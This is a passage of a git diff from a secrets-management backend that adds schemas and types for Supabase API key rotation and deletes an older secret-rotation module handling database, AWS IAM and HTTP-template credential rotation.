}; +}; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts new file mode 100644 index 00000000000..b3b262eeab8 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts @@ -0,0 +1,67 @@ +import { z } from "zod"; + +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { + BaseCreateSecretRotationSchema, + BaseSecretRotationSchema, + BaseUpdateSecretRotationSchema +} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-schemas"; +import { SecretRotations } from "@app/lib/api-docs"; +import { SecretNameSchema } from "@app/server/lib/schemas"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +export const SupabaseApiKeyRotationGeneratedCredentialsSchema = z + .object({ + apiKey: z.string(), + keyId: z.string() + }) + .array() + .min(1) + .max(2); + +export enum SupabaseApiKeyType { + Publishable = "publishable", + Secret = "secret" +} + +const SupabaseApiKeyRotationParametersSchema = z.object({ + projectRef: z + .string() + .trim() + .min(1, "Project reference required") + .describe(SecretRotations.PARAMETERS.SUPABASE_API_KEY.projectRef), + keyType: z.nativeEnum(SupabaseApiKeyType).describe(SecretRotations.PARAMETERS.SUPABASE_API_KEY.keyType) +}); + +const SupabaseApiKeyRotationSecretsMappingSchema = z.object({ + apiKey: SecretNameSchema.describe(SecretRotations.SECRETS_MAPPING.SUPABASE_API_KEY.apiKey) +}); + +export const SupabaseApiKeyRotationTemplateSchema = z.object({ + secretsMapping: z.object({ + apiKey: z.string() + }) +}); + +export const SupabaseApiKeyRotationSchema = BaseSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + type: z.literal(SecretRotation.SupabaseApiKey), + parameters: SupabaseApiKeyRotationParametersSchema, + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema +}); + +export const CreateSupabaseApiKeyRotationSchema = BaseCreateSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + parameters: SupabaseApiKeyRotationParametersSchema, + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema +}); + +export const UpdateSupabaseApiKeyRotationSchema = BaseUpdateSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + parameters: SupabaseApiKeyRotationParametersSchema.optional(), + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema.optional() +}); + +export const SupabaseApiKeyRotationListItemSchema = z.object({ + name: z.literal("Supabase API Key"), + connection: z.literal(AppConnection.Supabase), + type: z.literal(SecretRotation.SupabaseApiKey), + template: SupabaseApiKeyRotationTemplateSchema +}); diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts new file mode 100644 index 00000000000..374b2489eb0 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts @@ -0,0 +1,37 @@ +import { z } from "zod"; + +import { TSupabaseConnection } from "@app/services/app-connection/supabase"; + +import { + CreateSupabaseApiKeyRotationSchema, + SupabaseApiKeyRotationGeneratedCredentialsSchema, + SupabaseApiKeyRotationListItemSchema, + SupabaseApiKeyRotationSchema +} from "./supabase-api-key-rotation-schemas"; + +export type TSupabaseApiKeyRotation = z.infer; + +export type TSupabaseApiKeyRotationInput = z.infer; + +export type TSupabaseApiKeyRotationListItem = z.infer; + +export type TSupabaseApiKeyRotationWithConnection = TSupabaseApiKeyRotation & { + connection: TSupabaseConnection; +}; + +export type TSupabaseApiKeyRotationGeneratedCredentials = z.infer< + typeof SupabaseApiKeyRotationGeneratedCredentialsSchema +>; + +export type TSupabaseApiKeyCreateResponse = { + api_key: string | null; + id: string | null; + type: "legacy" | "publishable" | "secret" | null; + prefix: string | null; + name: string; + description: string | null; + hash: string | null; + secret_jwt_template: Record | null; + inserted_at: string | null; + updated_at: string | null; +}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts b/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts deleted file mode 100644 index 7f885e4f935..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts +++ /dev/null @@ -1,159 +0,0 @@ -import { Knex } from "knex"; - -import { TDbClient } from "@app/db"; -import { SecretRotationsSchema, TableName, TSecretRotations } from "@app/db/schemas"; -import { DatabaseError } from "@app/lib/errors"; -import { ormify, selectAllTableCols, sqlNestRelationships, TFindFilter } from "@app/lib/knex"; - -export type TSecretRotationDALFactory = ReturnType; - -export const secretRotationDALFactory = (db: TDbClient) => { - const secretRotationOrm = ormify(db, TableName.SecretRotation); - const secretRotationOutputOrm = ormify(db, TableName.SecretRotationOutput); - const secretRotationOutputV2Orm = ormify(db, TableName.SecretRotationOutputV2); - - const findQuery = (filter: TFindFilter, tx: Knex) => - tx(TableName.SecretRotation) - .where(filter) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .leftJoin( - TableName.SecretRotationOutput, - `${TableName.SecretRotation}.id`, - `${TableName.SecretRotationOutput}.rotationId` - ) - .join(TableName.Secret, `${TableName.SecretRotationOutput}.secretId`, `${TableName.Secret}.id`) - .select(selectAllTableCols(TableName.SecretRotation)) - .select(tx.ref("name").withSchema(TableName.Environment).as("envName")) - .select(tx.ref("slug").withSchema(TableName.Environment).as("envSlug")) - .select(tx.ref("id").withSchema(TableName.Environment).as("envId")) - .select(tx.ref("projectId").withSchema(TableName.Environment)) - .select(tx.ref("key").withSchema(TableName.SecretRotationOutput).as("outputKey")) - .select(tx.ref("id").withSchema(TableName.Secret).as("secId")) - .select(tx.ref("version").withSchema(TableName.Secret).as("secVersion")) - .select(tx.ref("secretKeyIV").withSchema(TableName.Secret)) - .select(tx.ref("secretKeyTag").withSchema(TableName.Secret)) - .select(tx.ref("secretKeyCiphertext").withSchema(TableName.Secret)); - - const find = async (filter: TFindFilter, tx?: Knex) => { - try { - const data = await findQuery(filter, tx || db.replicaNode()); - return sqlNestRelationships({ - data, - key: "id", - parentMapper: (el) => ({ - ...SecretRotationsSchema.parse(el), - projectId: el.projectId, - environment: { id: el.envId, name: el.envName, slug: el.envSlug } - }), - childrenMapper: [ - { - key: "secId", - label: "outputs" as const, - mapper: ({ secId, outputKey, secVersion, secretKeyIV, secretKeyTag, secretKeyCiphertext }) => ({ - key: outputKey, - secret: { - id: secId, - version: secVersion, - secretKeyIV, - secretKeyTag, - secretKeyCiphertext - } - }) - } - ] - }); - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFind" }); - } - }; - - const findQuerySecretV2 = (filter: TFindFilter, tx: Knex) => - tx(TableName.SecretRotation) - .where(filter) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .leftJoin( - TableName.SecretRotationOutputV2, - `${TableName.SecretRotation}.id`, - `${TableName.SecretRotationOutputV2}.rotationId` - ) - .join(TableName.SecretV2, `${TableName.SecretRotationOutputV2}.secretId`, `${TableName.SecretV2}.id`) - .select(selectAllTableCols(TableName.SecretRotation)) - .select(tx.ref("name").withSchema(TableName.Environment).as("envName")) - .select(tx.ref("slug").withSchema(TableName.Environment).as("envSlug")) - .select(tx.ref("id").withSchema(TableName.Environment).as("envId")) - .select(tx.ref("projectId").withSchema(TableName.Environment)) - .select(tx.ref("key").withSchema(TableName.SecretRotationOutputV2).as("outputKey")) - .select(tx.ref("id").withSchema(TableName.SecretV2).as("secId")) - .select(tx.ref("version").withSchema(TableName.SecretV2).as("secVersion")) - .select(tx.ref("key").withSchema(TableName.SecretV2).as("secretKey")); - - const findSecretV2 = async (filter: TFindFilter, tx?: Knex) => { - try { - const data = await findQuerySecretV2(filter, tx || db.replicaNode()); - return sqlNestRelationships({ - data, - key: "id", - parentMapper: (el) => ({ - ...SecretRotationsSchema.parse(el), - projectId: el.projectId, - environment: { id: el.envId, name: el.envName, slug: el.envSlug } - }), - childrenMapper: [ - { - key: "secId", - label: "outputs" as const, - mapper: ({ secId, outputKey, secVersion, secretKey }) => ({ - key: outputKey, - secret: { - id: secId, - version: secVersion, - secretKey - } - }) - } - ] - }); - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFind" }); - } - }; - - const findById = async (id: string, tx?: Knex) => { - try { - const doc = await (tx || db.replicaNode())(TableName.SecretRotation) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .where({ [`${TableName.SecretRotation}.id` as "id"]: id }) - .select(selectAllTableCols(TableName.SecretRotation)) - .select( - db.ref("id").withSchema(TableName.Environment).as("envId"), - db.ref("projectId").withSchema(TableName.Environment), - db.ref("slug").withSchema(TableName.Environment).as("envSlug"), - db.ref("name").withSchema(TableName.Environment).as("envName") - ) - .first(); - if (doc) { - const { envName, envSlug, envId, ...el } = doc; - return { ...el, envId, environment: { id: envId, slug: envSlug, name: envName } }; - } - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFindById" }); - } - }; - - const findRotationOutputsByRotationId = async (rotationId: string) => secretRotationOutputOrm.find({ rotationId }); - const findRotationOutputsV2ByRotationId = async (rotationId: string) => - secretRotationOutputV2Orm.find({ rotationId }); - - // special query - - return { - ...secretRotationOrm, - find, - findSecretV2, - findById, - secretOutputInsertMany: secretRotationOutputOrm.insertMany, - secretOutputV2InsertMany: secretRotationOutputV2Orm.insertMany, - findRotationOutputsByRotationId, - findRotationOutputsV2ByRotationId - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts deleted file mode 100644 index 1d8c50b363f..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts +++ /dev/null @@ -1,2 +0,0 @@ -export type { TSecretRotationQueueFactory } from "./secret-rotation-queue"; -export { DisableRotationErrors, secretRotationQueueFactory } from "./secret-rotation-queue"; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts deleted file mode 100644 index 8cc7dac4ba8..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts +++ /dev/null @@ -1,193 +0,0 @@ -/* eslint-disable @typescript-eslint/no-unsafe-argument */ -/* eslint-disable @typescript-eslint/no-unsafe-member-access */ -/* eslint-disable @typescript-eslint/no-unsafe-return */ -/* eslint-disable @typescript-eslint/no-unsafe-assignment */ -/* eslint-disable @typescript-eslint/no-explicit-any */ -/* eslint-disable no-param-reassign */ -import axios from "axios"; -import jmespath from "jmespath"; -import knex from "knex"; - -import { alphaNumericNanoId } from "@app/lib/nanoid"; - -import { verifyHostInputValidity } from "../../dynamic-secret/dynamic-secret-fns"; -import { TAssignOp, TDbProviderClients, TDirectAssignOp, THttpProviderFunction } from "../templates/types"; -import { TSecretRotationData, TSecretRotationDbFn } from "./secret-rotation-queue-types"; - -const EXTERNAL_REQUEST_TIMEOUT = 10 * 1000; - -const replaceTemplateVariables = (str: string, getValue: (key: string) => unknown) => { - // Use array to collect pieces and join at the end (more efficient for large strings) - const parts: string[] = []; - let pos = 0; - - while (pos < str.length) { - const start = str.indexOf("${", pos); - if (start === -1) { - parts.push(str.slice(pos)); - break; - } - - parts.push(str.slice(pos, start)); - const end = str.indexOf("}", start + 2); - - if (end === -1) { - parts.push(str.slice(start)); - break; - } - - const varName = str.slice(start + 2, end); - parts.push(String(getValue(varName))); - pos = end + 1; - } - - return parts.join(""); -}; - -export const interpolate = (data: any, getValue: (key: string) => unknown) => { - if (!data) return; - - if (typeof data === "number") return data; - - if (typeof data === "string") { - return replaceTemplateVariables(data, getValue); - } - - if (typeof data === "object" && Array.isArray(data)) { - data.forEach((el, index) => { - // eslint-disable-next-line - data[index] = interpolate(el, getValue); - }); - } - - if (typeof data === "object") { - if ((data as { ref: string })?.ref) return getValue((data as { ref: string }).ref); - const temp = data as Record; // for converting ts object to record type - Object.keys(temp).forEach((key) => { - temp[key] = interpolate(data[key], getValue); - }); - } - return data; -}; - -const getInterpolationValue = (variables: TSecretRotationData) => (key: string) => { - if (key.includes("|")) { - const [keyword, ...arg] = key.split("|").map((el) => el.trim()); - switch (keyword) { - case "random": { - return alphaNumericNanoId(parseInt(arg[0], 10)); - } - default: { - throw Error(`Interpolation key not found - ${key}`); - } - } - } - const [type, keyName] = key.split(".").map((el) => el.trim()); - return variables[type as keyof TSecretRotationData][keyName]; -}; - -export const secretRotationHttpFn = async (func: THttpProviderFunction, variables: TSecretRotationData) => { - // string interpolation - const headers = interpolate(func.header, getInterpolationValue(variables)); - const url = interpolate(func.url, getInterpolationValue(variables)); - const body = interpolate(func.body, getInterpolationValue(variables)); - // axios will automatically throw error if req status is not between 2xx range - return axios({ - method: func.method, - url, - headers, - data: body, - timeout: EXTERNAL_REQUEST_TIMEOUT, - signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT) - }); -}; - -export const secretRotationDbFn = async ({ - ca, - host, - port, - query, - database, - password, - username, - client, - variables, - options -}: TSecretRotationDbFn) => { - const ssl = ca ? { rejectUnauthorized: false, ca } : undefined; - const [hostIp] = await verifyHostInputValidity({ host, isDynamicSecret: false }); - const db = knex({ - client, - connection: { - database, - port, - host: hostIp, - user: username, - password, - connectionTimeoutMillis: EXTERNAL_REQUEST_TIMEOUT, - ssl, - pool: { min: 0, max: 1 }, - options - } - }); - const data = await db.raw(query, variables); - return data; -}; - -export const secretRotationPreSetFn = (op: Record, variables: TSecretRotationData) => { - const getValFn = getInterpolationValue(variables); - Object.entries(op || {}).forEach(([key, assignFn]) => { - const [type, keyName] = key.split(".") as [keyof TSecretRotationData, string]; - variables[type][keyName] = interpolate(assignFn.value, getValFn); - }); -}; - -export const secretRotationHttpSetFn = async (func: THttpProviderFunction, variables: TSecretRotationData) => { - const getValFn = getInterpolationValue(variables); - // http setter - const res = await secretRotationHttpFn(func, variables); - Object.entries(func.setter || {}).forEach(([key, assignFn]) => { - const [type, keyName] = key.split(".") as [keyof TSecretRotationData, string]; - if (assignFn.assign === TAssignOp.JmesPath) { - variables[type][keyName] = jmespath.search(res.data, assignFn.path); - } else if (assignFn.value) { - variables[type][keyName] = interpolate(assignFn.value, getValFn); - } - }); -}; - -export const getDbSetQuery = (db: TDbProviderClients, variables: { username: string; password: string }) => { - if (db === TDbProviderClients.Pg) { - return { - query: `ALTER USER ?? WITH PASSWORD '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.MsSqlServer) { - return { - query: `ALTER LOGIN ?? WITH PASSWORD = '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.MySql) { - return { - query: `ALTER USER ??@'%' IDENTIFIED BY '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.OracleDB) { - return { - query: `ALTER USER ?? IDENTIFIED BY "${variables.password}"`, - variables: [variables.username] - }; - } - - // add more based on client - return { - query: `ALTER USER ?? IDENTIFIED BY '${variables.password}'`, - variables: [variables.username] - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts deleted file mode 100644 index e0d4c18761b..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts +++ /dev/null @@ -1,28 +0,0 @@ -import { TDbProviderClients } from "../templates/types"; - -export type TSecretRotationEncData = { - inputs: Record; - creds: Array<{ - outputs: Record; - internal: Record; - }>; -}; - -export type TSecretRotationData = { - inputs: Record; - outputs: Record; - internal: Record; -}; - -export type TSecretRotationDbFn = { - client: TDbProviderClients; - username: string; - password: string; - host: string; - database: string; - port: number; - query: string; - variables: unknown[]; - ca?: string; - options?: Record; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts deleted file mode 100644 index 0464d23d265..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts +++ /dev/null @@ -1,442 +0,0 @@ -import { - CreateAccessKeyCommand, - DeleteAccessKeyCommand, - GetAccessKeyLastUsedCommand, - IAMClient -} from "@aws-sdk/client-iam"; - -import { SecretType } from "@app/db/schemas"; -import { CustomAWSHasher } from "@app/lib/aws/hashing"; -import { getConfig } from "@app/lib/config/env"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; -import { daysToMillisecond, secondsToMillis } from "@app/lib/dates"; -import { NotFoundError } from "@app/lib/errors"; -import { logger } from "@app/lib/logger"; -import { alphaNumericNanoId } from "@app/lib/nanoid"; -import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; -import { ActorType } from "@app/services/auth/auth-type"; -import { CommitType, TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service"; -import { TKmsServiceFactory } from "@app/services/kms/kms-service"; -import { KmsDataKey } from "@app/services/kms/kms-types"; -import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; -import { TSecretDALFactory } from "@app/services/secret/secret-dal"; -import { TSecretVersionDALFactory } from "@app/services/secret/secret-version-dal"; -import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; -import { TSecretVersionV2DALFactory } from "@app/services/secret-v2-bridge/secret-version-dal"; -import { TTelemetryServiceFactory } from "@app/services/telemetry/telemetry-service"; -import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; - -import { TSecretRotationDALFactory } from "../secret-rotation-dal"; -import { rotationTemplates } from "../templates"; -import { - TAwsProviderSystems, - TDbProviderClients, - TProviderFunctionTypes, - TSecretRotationProviderTemplate -} from "../templates/types"; -import { - getDbSetQuery, - secretRotationDbFn, - secretRotationHttpFn, - secretRotationHttpSetFn, - secretRotationPreSetFn -} from "./secret-rotation-queue-fn"; -import { TSecretRotationData, TSecretRotationDbFn, TSecretRotationEncData } from "./secret-rotation-queue-types"; - -export type TSecretRotationQueueFactory = ReturnType; - -type TSecretRotationQueueFactoryDep = { - queue: TQueueServiceFactory; - secretRotationDAL: TSecretRotationDALFactory; - projectBotService: Pick; - secretDAL: Pick; - secretV2BridgeDAL: Pick; - secretVersionDAL: Pick; - secretVersionV2BridgeDAL: Pick; - telemetryService: Pick; - kmsService: Pick; - folderCommitService: Pick; -}; - -// These error should stop the repeatable job and ask user to reconfigure rotation -export class DisableRotationErrors extends Error { - name: string; - - error: unknown; - - constructor({ name, error, message }: { message: string; name?: string; error?: unknown }) { - super(message); - this.name = name || "DisableRotationErrors"; - this.error = error; - } -} - -export const secretRotationQueueFactory = ({ - queue, - secretRotationDAL, - projectBotService, - secretDAL, - secretVersionDAL, - telemetryService, - secretV2BridgeDAL, - secretVersionV2BridgeDAL, - folderCommitService, - kmsService -}: TSecretRotationQueueFactoryDep) => { - const addToQueue = async () => {}; - - const removeFromQueue = async (rotationId: string, interval: number) => { - const appCfg = getConfig(); - await queue.stopRepeatableJob( - QueueName.SecretRotation, - QueueJobs.SecretRotation, - { - // on prod it this will be in days, in development this will be second - every: appCfg.NODE_ENV === "development" ? secondsToMillis(interval) : daysToMillisecond(interval) - }, - rotationId - ); - }; - - queue.start(QueueName.SecretRotation, async (job) => { - const { rotationId } = job.data; - const appCfg = getConfig(); - - logger.info(`secretRotationQueue.process: [rotationDocument=${rotationId}]`); - const secretRotation = await secretRotationDAL.findById(rotationId); - const rotationProvider = rotationTemplates.find(({ name }) => name === secretRotation?.provider); - - try { - if (!rotationProvider || !secretRotation) throw new DisableRotationErrors({ message: "Provider not found" }); - - const { botKey, shouldUseSecretV2Bridge } = await projectBotService.getBotKey(secretRotation.projectId); - let rotationOutputs; - if (shouldUseSecretV2Bridge) { - rotationOutputs = await secretRotationDAL.findRotationOutputsV2ByRotationId(rotationId); - } else { - rotationOutputs = await secretRotationDAL.findRotationOutputsByRotationId(rotationId); - } - if (!rotationOutputs.length) throw new DisableRotationErrors({ message: "Secrets not found" }); - - // deep copy - const provider = JSON.parse(JSON.stringify(rotationProvider)) as TSecretRotationProviderTemplate; - const { encryptor: secretManagerEncryptor, decryptor: secretManagerDecryptor } = - await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId: secretRotation.projectId - }); - - const decryptedData = secretManagerDecryptor({ - cipherTextBlob: secretRotation.encryptedRotationData - }).toString(); - - const variables = JSON.parse(decryptedData) as TSecretRotationEncData; - // rotation set cycle - const newCredential: TSecretRotationData = { - inputs: variables.inputs, - outputs: {}, - internal: {} - }; - - /* Rotation Function For Database - * A database like sql cannot have multiple password for a user - * thus we ask users to create two users with required permission and then we keep cycling between these two db users - */ - if (provider.template.type === TProviderFunctionTypes.DB) { - const lastCred = variables.creds.at(-1); - if (lastCred && variables.creds.length === 1) { - newCredential.internal.username = - lastCred.internal.username === variables.inputs.username1 - ? variables.inputs.username2 - : variables.inputs.username1; - } else { - newCredential.internal.username = lastCred ? lastCred.internal.username : variables.inputs.username1; - } - // set a random value for new password - newCredential.internal.rotated_password = alphaNumericNanoId(32); - const { admin_username: username, admin_password: password, host, database, port, ca } = newCredential.inputs; - - const options = - provider.template.client === TDbProviderClients.MsSqlServer - ? ({ - encrypt: appCfg.ENABLE_MSSQL_SECRET_ROTATION_ENCRYPT, - // when ca is provided use that - trustServerCertificate: !ca, - cryptoCredentialsDetails: ca ? { ca } : {} - } as Record) - : undefined; - - const dbFunctionArg = { - username, - password, - host, - database, - port, - ca: ca as string, - client: provider.template.client === TDbProviderClients.MySql ? "mysql2" : provider.template.client, - options - } as TSecretRotationDbFn; - - // set function - await secretRotationDbFn({ - ...dbFunctionArg, - ...getDbSetQuery(provider.template.client, { - password: newCredential.internal.rotated_password as string, - username: newCredential.internal.username as string - }) - }); - - // test function - const testQuery = - provider.template.client === TDbProviderClients.MsSqlServer ? "SELECT GETDATE()" : "SELECT NOW()"; - - await secretRotationDbFn({ - ...dbFunctionArg, - query: testQuery, - variables: [] - }); - - newCredential.outputs.db_username = newCredential.internal.username; - newCredential.outputs.db_password = newCredential.internal.rotated_password; - // clean up - if (variables.creds.length === 2) variables.creds.pop(); - } - - /* - * Rotation Function For AWS Services - * Due to complexity in AWS Authorization hashing signature process we keep it as seperate entity instead of http template mode - * We first delete old key before creating a new one because aws iam has a quota limit of 2 keys - * */ - if (provider.template.type === TProviderFunctionTypes.AWS) { - if (provider.template.client === TAwsProviderSystems.IAM) { - const client = new IAMClient({ - useFipsEndpoint: crypto.isFipsModeEnabled(), - sha256: CustomAWSHasher, - region: newCredential.inputs.manager_user_aws_region as string, - credentials: { - accessKeyId: newCredential.inputs.manager_user_access_key as string, - secretAccessKey: newCredential.inputs.manager_user_secret_key as string - } - }); - - const iamUserName = newCredential.inputs.iam_username as string; - - if (variables.creds.length === 2) { - const deleteCycleCredential = variables.creds.pop(); - if (deleteCycleCredential) { - const deletedIamAccessKey = await client.send( - new DeleteAccessKeyCommand({ - UserName: iamUserName, - AccessKeyId: deleteCycleCredential.outputs.iam_user_access_key as string - }) - ); - - if ( - !deletedIamAccessKey?.$metadata?.httpStatusCode || - deletedIamAccessKey?.$metadata?.httpStatusCode > 300 - ) { - throw new DisableRotationErrors({ - message: "Failed to delete aws iam access key. Check managed iam user policy" - }); - } - } - } - - const newIamAccessKey = await client.send(new CreateAccessKeyCommand({ UserName: iamUserName })); - if (!newIamAccessKey.AccessKey) - throw new DisableRotationErrors({ message: "Failed to create access key. Check managed iam user policy" }); - - // test - const testAccessKey = await client.send( - new GetAccessKeyLastUsedCommand({ AccessKeyId: newIamAccessKey.AccessKey.AccessKeyId }) - ); - if (testAccessKey?.UserName !== iamUserName) - throw new DisableRotationErrors({ message: "Failed to create access key. Check managed iam user policy" }); - - newCredential.outputs.iam_user_access_key = newIamAccessKey.AccessKey.AccessKeyId; - newCredential.outputs.iam_user_secret_key = newIamAccessKey.AccessKey.SecretAccessKey; - } - } - - /* Rotation function of HTTP infisical template - * This is a generic http based template system for rotation - * we use this for sendgrid and for custom secret rotation - * This will ensure user provided rotation is easier to make - * */ - if (provider.template.type === TProviderFunctionTypes.HTTP) { - if (provider.template.functions.set?.pre) { - secretRotationPreSetFn(provider.template.functions.set.pre, newCredential); - } - await secretRotationHttpSetFn(provider.template.functions.set, newCredential); - // now test - await secretRotationHttpFn(provider.template.functions.test, newCredential); - if (variables.creds.length === 2) { - const deleteCycleCred = variables.creds.pop(); - if (deleteCycleCred && provider.template.functions.remove) { - const deleteCycleVar = { inputs: variables.inputs, ...deleteCycleCred }; - await secretRotationHttpFn(provider.template.functions.remove, deleteCycleVar); - } - } - } - - // insert the new variables to start - // encrypt the data - save it - variables.creds.unshift({ - outputs: newCredential.outputs, - internal: newCredential.internal - }); - const encryptedRotationData = secretManagerEncryptor({ - plainText: Buffer.from(JSON.stringify(variables)) - }).cipherTextBlob; - - const numberOfSecretsRotated = rotationOutputs.length; - if (shouldUseSecretV2Bridge) { - const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({ - secretId, - value: - typeof newCredential.outputs[outputKey] === "object" - ? JSON.stringify(newCredential.outputs[outputKey]) - : String(newCredential.outputs[outputKey]) - })); - // map the final values to output keys in the board - await secretRotationDAL.transaction(async (tx) => { - await secretRotationDAL.updateById( - rotationId, - { - encryptedRotationData, - lastRotatedAt: new Date(), - statusMessage: "Rotated successfull", - status: "success" - }, - tx - ); - const updatedSecrets = await secretV2BridgeDAL.bulkUpdate( - encryptedSecrets.map(({ secretId, value }) => ({ - // this secret id is validated when user is inserted - filter: { id: secretId, type: SecretType.Shared }, - data: { - encryptedValue: secretManagerEncryptor({ plainText: Buffer.from(value) }).cipherTextBlob - } - })), - tx - ); - const secretVersions = await secretVersionV2BridgeDAL.insertMany( - updatedSecrets.map(({ id, updatedAt, createdAt, ...el }) => ({ - ...el, - actorType: ActorType.PLATFORM, - secretId: id - })), - tx - ); - - await folderCommitService.createCommit( - { - actor: { - type: ActorType.PLATFORM - }, - message: "Changed by Secret rotation", - folderId: secretVersions[0].folderId, - changes: secretVersions.map((sv) => ({ - type: CommitType.ADD, - isUpdate: true, - secretVersionId: sv.id - })) - }, - tx - ); - await secretV2BridgeDAL.invalidateSecretCacheByProjectId(secretRotation.projectId, tx); - }); - } else { - if (!botKey) - throw new NotFoundError({ - message: `Project bot not found for project with ID '${secretRotation.projectId}'` - }); - - const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({ - secretId, - value: crypto - .encryption() - .symmetric() - .encrypt({ - plaintext: - typeof newCredential.outputs[outputKey] === "object" - ? JSON.stringify(newCredential.outputs[outputKey]) - : String(newCredential.outputs[outputKey]), - key: botKey, - keySize: SymmetricKeySize.Bits128 - }) - })); - - // map the final values to output keys in the board - await secretRotationDAL.transaction(async (tx) => { - await secretRotationDAL.updateById( - rotationId, - { - encryptedRotationData, - lastRotatedAt: new Date(), - statusMessage: "Rotated successfull", - status: "success" - }, - tx - ); - const updatedSecrets = await secretDAL.bulkUpdate( - encryptedSecrets.map(({ secretId, value }) => ({ - // this secret id is validated when user is inserted - filter: { id: secretId, type: SecretType.Shared }, - data: { - secretValueCiphertext: value.ciphertext, - secretValueIV: value.iv, - secretValueTag: value.tag - } - })), - tx - ); - await secretVersionDAL.insertMany( - updatedSecrets.map(({ id, updatedAt, createdAt, ...el }) => { - if (!el.secretBlindIndex) { - throw new NotFoundError({ message: `Secret blind index not found on secret with ID '${id}` }); - } - return { - ...el, - secretId: id, - secretBlindIndex: el.secretBlindIndex - }; - }), - tx - ); - }); - } - - await telemetryService.sendPostHogEvents({ - event: PostHogEventTypes.SecretRotated, - distinctId: "", - properties: { - numberOfSecrets: numberOfSecretsRotated, - environment: secretRotation.environment.slug, - secretPath: secretRotation.secretPath, - projectId: secretRotation.projectId - } - }); - - logger.info("Finished rotating: rotation id: ", rotationId); - } catch (error) { - logger.error(error, "Failed to execute secret rotation"); - if (error instanceof DisableRotationErrors) { - if (job.id) { - await queue.stopRepeatableJobByJobId(QueueName.SecretRotation, job.id); - } - } - - await secretRotationDAL.updateById(rotationId, { - status: "failed", - statusMessage: (error as Error).message.slice(0, 500), - lastRotatedAt: new Date() - }); - } - }); - - return { - addToQueue, - removeFromQueue - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-service.ts b/backend/src/ee/services/secret-rotation/secret-rotation-service.ts deleted file mode 100644 index a093f879072..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-service.ts +++ /dev/null @@ -1,312 +0,0 @@ -import { ForbiddenError, subject } from "@casl/ability"; -import Ajv from "ajv"; - -import { ActionProjectType, ProjectVersion, TableName } from "@app/db/schemas"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; -import { BadRequestError, NotFoundError } from "@app/lib/errors"; -import { TProjectPermission } from "@app/lib/types"; -import { TKmsServiceFactory } from "@app/services/kms/kms-service"; -import { KmsDataKey } from "@app/services/kms/kms-types"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; -import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; -import { TSecretDALFactory } from "@app/services/secret/secret-dal"; -import { TSecretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal"; -import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; - -import { TLicenseServiceFactory } from "../license/license-service"; -import { TPermissionServiceFactory } from "../permission/permission-service-types"; -import { - ProjectPermissionSecretActions, - ProjectPermissionSecretRotationActions, - ProjectPermissionSub -} from 